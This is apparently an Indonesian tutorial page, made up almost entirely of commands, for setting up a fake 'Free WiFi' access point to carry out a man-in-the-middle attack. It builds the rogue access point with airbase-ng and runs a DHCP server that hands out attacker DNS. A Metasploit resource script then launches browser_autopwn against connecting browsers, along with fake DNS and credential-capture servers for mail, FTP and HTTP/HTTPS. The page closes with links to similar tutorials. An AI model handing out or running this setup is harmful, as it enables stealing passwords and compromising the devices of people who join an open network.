Teknik Man-in-The-Middle Attack / FakeAP
Versi Singkat membuat Fake AP
airbase-ng -e "Free WiFi" -P -C 30 -v wlan0
Versi lengkap untuk MiTM attack
Summary perintah yang digunakan
svn co http://trac.aircrack-ng.org/svn/trunk/ aircrack-ng cd aircrack-ng/ make make install
airmon-ng start wlan0 airbase-ng -e "Evil Wireless" -v mon0 ifconfig at0 10.0.0.1 netmask 255.255.255.0
apt-get install dhcp3-server vi /etc/dhcpd3/evil-wireless.conf
option domain-name-servers 10.0.0.1; default-lease-time 60; max-lease-time 72; ddns-update-style none; authoritative; log-facility local7; subnet 10.0.0.0 netmask 255.255.255.0 { range 10.0.0.100 10.0.0.254; option routers 10.0.0.1; option domain-name-servers 10.0.0.1; }
dhcpd3 -cf /etc/dhcp3/evil-wireless.conf
ifconfig mon0 mtu 1800 ifconfig at0 mtu 1400 svn co http://metasploit.com/svn/framework3/trunk msf3 gem install activerecord sqlite3-ruby
vi evilwireless.rc
load db_sqlite3 db_create /root/evilwireless.db use auxiliary/server/browser_autopwn setg AUTOPWN_HOST 10.0.0.1 setg AUTOPWN_PORT 55550 setg AUTOPWN_URI /ads set LHOST 10.0.0.1 set LPORT 45000 set SRVPORT 55550 set URIPATH /ads run use auxiliary/server/capture/pop3 set SRVPORT 110 set SSL false run use auxiliary/server/capture/pop3 set SRVPORT 995 set SSL true run use auxiliary/server/capture/ftp run use auxiliary/server/capture/imap set SSL false set SRVPORT 143 run use auxiliary/server/capture/imap set SSL true set SRVPORT 993 run use auxiliary/server/capture/smtp set SSL false set SRVPORT 25 run use auxiliary/server/capture/smtp set SSL true set SRVPORT 465 run use auxiliary/server/fakedns unset TARGETHOST set SRVPORT 5353 run use auxiliary/server/fakedns unset TARGETHOST set SRVPORT 53 run use auxiliary/server/capture/http set SRVPORT 80 set SSL false run use auxiliary/server/capture/http set SRVPORT 8080 set SSL false run use auxiliary/server/capture/http set SRVPORT 443 set SSL true run use auxiliary/server/capture/http set SRVPORT 8443 set SSL true run
./msfconsole -r evilwireless.rc
Referensi
- http://forums.remote-exploit.org/backtrack3-howtos/19048-rogue-accesspoint-mitm-sniffing-tutorial.html
- http://0x80.org/blog/?p=131 - The Evil Access Point
- http://forums.remote-exploit.org/wireless/23886-tutorial-how-create-fake-ap-auto-bash-script.html - How to create Face AP
- http://ww2.mastaputa.com:9999/?p=29
- http://fix-vista.com/windows-vista-installation-setup/fishing-windows-clients-with-airbase-ng-and-airchat